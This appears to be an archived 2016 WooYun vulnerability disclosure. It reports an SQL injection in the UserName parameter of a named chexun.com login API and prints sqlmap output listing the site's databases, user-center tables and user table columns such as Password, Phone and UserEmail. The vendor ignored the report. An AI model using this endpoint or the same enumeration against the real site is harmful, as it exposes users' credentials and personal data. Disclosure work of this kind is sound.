乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-01-02: 细节已通知厂商并且等待厂商处理中 2016-01-10: 厂商已经主动忽略漏洞,细节向公众公开
RT
漏洞页面:http://reg.chexun.com/API/PHPUCLogin.ashx?UserName=
available databases [21]:[*] CheBaiKe[*] DBAiKaZhuaQu[*] DBCarSite[*] DBCharacterLibrary[*] DBComment[*] DBDealersShop[*] DBDingYue[*] DBDoublue11[*] DBFeedback[*] DBSMS[*] DBTuangou[*] DBUCenter[*] DBVoting[*] DBWapNews[*] distribution[*] master[*] model[*] msdb[*] ProjectManagement[*] tempdb[*] ZhaoCheGameDB[12:07:52] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\reg.chexun.com'
Database: DBUCenter[21 tables]+----------------------------+| AdminLog || AdminUser || Comments_tab || CommonUser || CommonUserBak20151204 || CommonUserProfile || CommonUser_GroupId_UserBak || ConcernedType || LoginLog || OAuth_Client || RegSourceLog || RegSourceType || RegisterConfirm || Replys_tab || ThreePlatformUserInfo_tab || UserConcerned || UserGroupType || uc_albums || uc_mycars || uc_photocomments || uc_photos |+----------------------------+
Database: DBUCenterTable: CommonUser[33 columns]+---------------+----------+| Column | Type |+---------------+----------+| ActiCode | nvarchar || ActiDate | datetime || ADMIN_ID | numeric || Answer | nvarchar || BBSUID | nvarchar || BBSUserID | bigint || DealersID | bigint || DEPARTMENT_ID | numeric || GROUP_IDS | nvarchar || GroupId | nvarchar || ID | numeric || IP | nvarchar || LastLoginTime | datetime || LOGIN_TIMES | numeric || ModelID | bigint || Password | nvarchar || PEN_NAME | nvarchar || Phone | nvarchar || QQOpenID | nvarchar || QQWeiBo | nvarchar || Question | nvarchar || REAL_NAME | nvarchar || Regdate | nvarchar || RegSource | int || RenRenUserID | nvarchar || SEX | nchar || SinaUserID | nvarchar || Status | int || TARGET | nchar || TEMP | nvarchar || UserEmail | nvarchar || UserId | bigint || UserName | nvarchar |+---------------+----------+
过滤之类吧,你们经验肯定很丰富吧 :)
危害等级:无影响厂商忽略
忽略时间:2016-01-10 09:00
暂无